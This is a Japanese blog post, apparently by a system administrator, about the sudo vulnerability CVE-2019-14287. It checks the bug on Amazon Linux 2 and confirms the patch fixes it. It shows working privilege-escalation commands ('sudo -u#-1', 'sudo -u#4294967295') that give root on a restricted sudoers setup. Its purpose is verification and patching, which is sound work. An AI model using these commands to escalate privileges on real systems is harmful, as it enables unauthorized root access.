ニュース情報
情報が出始めたのは15日朝くらいからかな
Engadget JP
SIOS
Redhat
CVE-2019-14287
内容
脆弱性を利用するには ユーザーが任意のユーザーIDでコマンドを実行できるsudo特権を持っている必要があり、ユーザーのsudoersエントリのRunas指定子に特別な値ALLがある必要がある
Redhatのサイトを見る限り脆弱性の影響を受ける Redhat系OS は 6~8 、サポートする全てだ
またサイトを見る限りはまだ15日 21時現在では パッチアップデートは出てないのかな?
AWSはアップデートパッケージ出してるからもうすぐ出るか、サイトに書いてないだけで出てるかも
マルチテナント、ホスティングとかでサーバを提供しているサービス会社はすぐアップデートしたほうがいいですね
特にサービス停止とか必要そうなアップデート作業でもなさそうだし
ただ結構 sudo の書式も含めて本脆弱性に該当しそうな環境って意外と少ないんじゃないかと思ってる
root も含めて全部許可か、 特定のユーザー権限のみ許可とかそういう記述が多いんじゃなかろうか
とわいえ複数社、複数担当がOSにログインする、それらを sudo で細かく権限制御している、とかであればとりあえず充てとこう
確認
SIOSのサイトを参考に本当にできるのか見てみる
sudo ALL権限を持つユーザーを作成
# cat /etc/sudoers.d/testgrp
%test ALL=(ALL, !root) ALL
# id test
uid=10003(test) gid=10003(test) groups=10003(test)
sudo コマンドのバージョン確認
$ rpm -qa |grep sudo
sudo-1.8.19p2-14.amzn2.x86_64
-1
ユーザー ID を指定してコマンドを実行してみる
権限的には見れないログファイルも。。。。
$ sudo tail /var/log/messages
[sudo] test のパスワード:
ユーザー test は'/bin/tail /var/log/messages' を root として localhost 上で実行することは許可されていません。すみません 。
$ sudo -u#-1 tail /var/log/messages
[sudo] test のパスワード:
Oct 15 21:30:43 localhost freshclam[8559]: ClamAV update process started at Tue Oct 15 21:30:43 2019
見れた!すげー!!
$ sudo -u#-1 id -u
[sudo] test のパスワード:
0
$ sudo -u#4294967295 id -u
[sudo] test のパスワード:
0
$ sudo -u#-1 id -g
[sudo] test のパスワード:
10003
ユーザーID はたしかに 0
になってる。グループはそのままだったけど
パッチアップデート
AWSはパッチ出たみたいなので充ててみる
# yum update sudo
========================================================================================================================
Package アーキテクチャー バージョン リポジトリー 容量
========================================================================================================================
更新します:
sudo x86_64 1.8.23-4.amzn2.0.1 amzn2-core 844 k
トランザクションの要約
========================================================================================================================
更新 1 パッケージ
アップデート後修正されているか確認
$ sudo -u#-1 tail /var/log/messages
sudo: 不明なユーザーです: #-1
sudo: ポリシープラグインを初期化できません
なおった~
おしまい